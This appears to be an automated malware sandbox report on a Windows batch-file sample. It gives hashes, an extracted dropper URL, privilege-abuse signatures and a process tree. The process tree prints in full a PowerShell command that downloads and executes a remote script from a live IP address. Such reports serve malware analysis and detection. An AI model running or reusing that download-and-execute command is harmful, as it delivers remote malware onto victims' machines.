Analysis
- max time kernel: 127s
- max time network: 149s
- platform: windows10_x64
- resource: win10v200430
- submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
- Sample: d414776d8291887b69e7e08716350a94.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: d414776d8291887b69e7e08716350a94.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: d414776d8291887b69e7e08716350a94.bat
- Size: 216B
- MD5: 44b1551634044bfd5c2101792984ab6a
- SHA1: c1c890dd032188b9c1488e5cf4ff4f22d88b74e5
- SHA256: d3acbb0ddca79d785f4a3c766cceeb94bc468b19bfa0ba495af8182fbd9c55a4
- SHA512: faae8800cab7d6fa3470130c293609b65607156bcb9403ac83e9cd20a4dfeea2c689287b066320dd344415d189fe9d01f2a2913f1d51c008da36b18a62bbd677
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94
Signatures
- Program crash (1 IoC)
  Processes: pid 1772 WerFault.exe, target pid 1344 powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: pid 1772 WerFault.exe
  - Token: SeRestorePrivilege
  - Token: SeBackupPrivilege
  - Token: SeDebugPrivilege
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: pid 1772 WerFault.exe (14 entries)
Processes
- [1] C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d414776d8291887b69e7e08716350a94.bat"
  PID: 1140
  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d414776d8291887b69e7e08716350a94');Invoke-IDZVZHFEB;Start-Sleep -s 10000"
    PID: 1344
    - [3] C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 704
      PID: 1772
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses